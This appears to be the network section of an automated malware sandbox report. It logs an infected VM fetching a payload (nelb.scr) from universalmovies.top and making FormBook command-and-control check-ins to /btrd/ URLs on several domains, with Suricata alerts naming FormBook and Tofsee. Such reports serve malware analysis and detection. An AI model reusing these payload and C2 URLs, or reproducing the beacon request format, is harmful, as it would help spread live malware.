Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
www.h7wlvwr4afx.top | | |
www.xmentorgroup.com | CNAME xmentorgroup.com; 3.33.130.190 | |
www.home-repair-contractors-kfm.xyz | 199.59.243.226 | |
www.liposuctionclinics2.today | 104.21.89.233 | |
universalmovies.top | 172.67.162.95 | |
UDP Requests
- 192.168.56.101:53004 -> 164.124.101.2:53
- 192.168.56.101:53850 -> 164.124.101.2:53
- 192.168.56.101:54148 -> 164.124.101.2:53
- 192.168.56.101:54883 -> 164.124.101.2:53
- 192.168.56.101:55146 -> 164.124.101.2:53
- 192.168.56.101:59002 -> 164.124.101.2:53
- 192.168.56.101:61950 -> 164.124.101.2:53
- 192.168.56.101:137 -> 192.168.56.103:137
- 192.168.56.101:137 -> 192.168.56.255:137
- 192.168.56.101:138 -> 192.168.56.255:138
- 192.168.56.101:53853 -> 239.255.255.250:1900
- 52.231.114.183:123 -> 192.168.56.101:123
HTTP Requests
GET 200 https://universalmovies.top/nelb.scr
REQUEST
GET /nelb.scr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
Host: universalmovies.top
Connection: Keep-Alive
RESPONSE
HTTP/1.1 200 OK
Date: Wed, 26 Jun 2024 01:10:18 GMT
Content-Type: application/x-silverlight
Content-Length: 591360
Connection: keep-alive
Last-Modified: Wed, 26 Jun 2024 00:07:23 GMT
ETag: "90600-61bbfcc76a572"
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XpkYYkMjFVzuu%2BMw2tv0Rq%2FRFfTwHEDpZQV8gdJ5bhfVDOvazvKMV2FKVkTrvgO7feKIhM8%2ByQFSBo2kZ%2Bg7aD04UaBLIvtehSG7MyBBrcSTuMcF5jiMeBjIMfb%2B56u4NPkbV4Gk"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=0; includeSubDomains; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8999511d885d090c-LAX
alt-svc: h3=":443"; ma=86400
GET 301 http://www.liposuctionclinics2.today/btrd/?FrJX9P9=g2Awi9gzMhKdCQNLs5BlCrpPGRTrEfCXfESYZTVa1wMirmNXITW5sw9ZqEJh6Ao16UcXSiJC&Vnt4_=-Z1l70lHPdrDeba
REQUEST
GET /btrd/?FrJX9P9=g2Awi9gzMhKdCQNLs5BlCrpPGRTrEfCXfESYZTVa1wMirmNXITW5sw9ZqEJh6Ao16UcXSiJC&Vnt4_=-Z1l70lHPdrDeba HTTP/1.1
Host: www.liposuctionclinics2.today
Connection: close
RESPONSE
HTTP/1.1 301 Moved Permanently
Date: Wed, 26 Jun 2024 01:10:52 GMT
Content-Type: text/html
Content-Length: 167
Connection: close
Cache-Control: max-age=3600
Expires: Wed, 26 Jun 2024 02:10:52 GMT
Location: https://www.liposuctionclinics2.today/btrd/?FrJX9P9=g2Awi9gzMhKdCQNLs5BlCrpPGRTrEfCXfESYZTVa1wMirmNXITW5sw9ZqEJh6Ao16UcXSiJC&Vnt4_=-Z1l70lHPdrDeba
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5TnY4m990gnmicU2JuFNts2Oobe6rce9iAr0L1LOvLlU%2FbzZH%2Bd9fQ0b3Yk%2B%2F2m1ohtJDW6KCbvmuyahGBJcKKk%2Bu5oIAgwsK9UpEMVgirSodbxQmxB8vmmaYAJ%2F7z0a%2BX3dwysGQFA6aBpTb0xGnw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 899951f37e787cf5-LAX
alt-svc: h3=":443"; ma=86400
GET 200 http://www.home-repair-contractors-kfm.xyz/btrd/?FrJX9P9=eVMlJIJ59eHiVvLGCrdtG7xbZNorDbW6x7q4JZ9YU9WFmkuuB+jImPCwzZVcR1MIE594ENWI&Vnt4_=-Z1l70lHPdrDeba
REQUEST
GET /btrd/?FrJX9P9=eVMlJIJ59eHiVvLGCrdtG7xbZNorDbW6x7q4JZ9YU9WFmkuuB+jImPCwzZVcR1MIE594ENWI&Vnt4_=-Z1l70lHPdrDeba HTTP/1.1
Host: www.home-repair-contractors-kfm.xyz
Connection: close
RESPONSE
HTTP/1.1 200 OK
date: Wed, 26 Jun 2024 01:11:13 GMT
content-type: text/html; charset=utf-8
content-length: 1402
x-request-id: 4b409a36-d68a-4e60-ae40-0b4fbd2cc9d4
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_C2AIsxAFFiV0gcsDd0JqVHfZg1Co+Sv2NwsaHdJRG4mZnJcLt54erwEW/1ZJgI9xQ7TOick9LbA97ibozdIvTw==
set-cookie: parking_session=4b409a36-d68a-4e60-ae40-0b4fbd2cc9d4; expires=Wed, 26 Jun 2024 01:26:13 GMT; path=/
connection: close
GET 200 http://www.xmentorgroup.com/btrd/?FrJX9P9=UYDnSobXWpXBVkfD89bcJt5KVoSCT9YF2HTPLZC4vkf0xFVelZyjEGpv0zxgTtsO2BXFiI/y&Vnt4_=-Z1l70lHPdrDeba
REQUEST
GET /btrd/?FrJX9P9=UYDnSobXWpXBVkfD89bcJt5KVoSCT9YF2HTPLZC4vkf0xFVelZyjEGpv0zxgTtsO2BXFiI/y&Vnt4_=-Z1l70lHPdrDeba HTTP/1.1
Host: www.xmentorgroup.com
Connection: close
RESPONSE
HTTP/1.1 200 OK
Server: openresty
Date: Wed, 26 Jun 2024 01:12:12 GMT
Content-Type: text/html
Content-Length: 217
Connection: close
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
UDP 192.168.56.101:53004 -> 164.124.101.2:53 | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | Potentially Bad Traffic |
UDP 192.168.56.101:61950 -> 164.124.101.2:53 | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | Potentially Bad Traffic |
TCP 192.168.56.101:49163 -> 104.21.74.191:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.101:49170 -> 172.67.148.235:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.101:49172 -> 3.33.130.190:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.101:49171 -> 199.59.243.226:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.101:49171 -> 199.59.243.226:80 | 2031088 | ET HUNTING Request to .XYZ Domain with Minimal Headers | Potentially Bad Traffic |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49163 -> 104.21.74.191:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=universalmovies.top | 67:bc:42:10:14:49:13:d3:52:bc:a7:fb:fc:bd:0e:1c:24:be:f9:a6 |
Snort Alerts
No Snort Alerts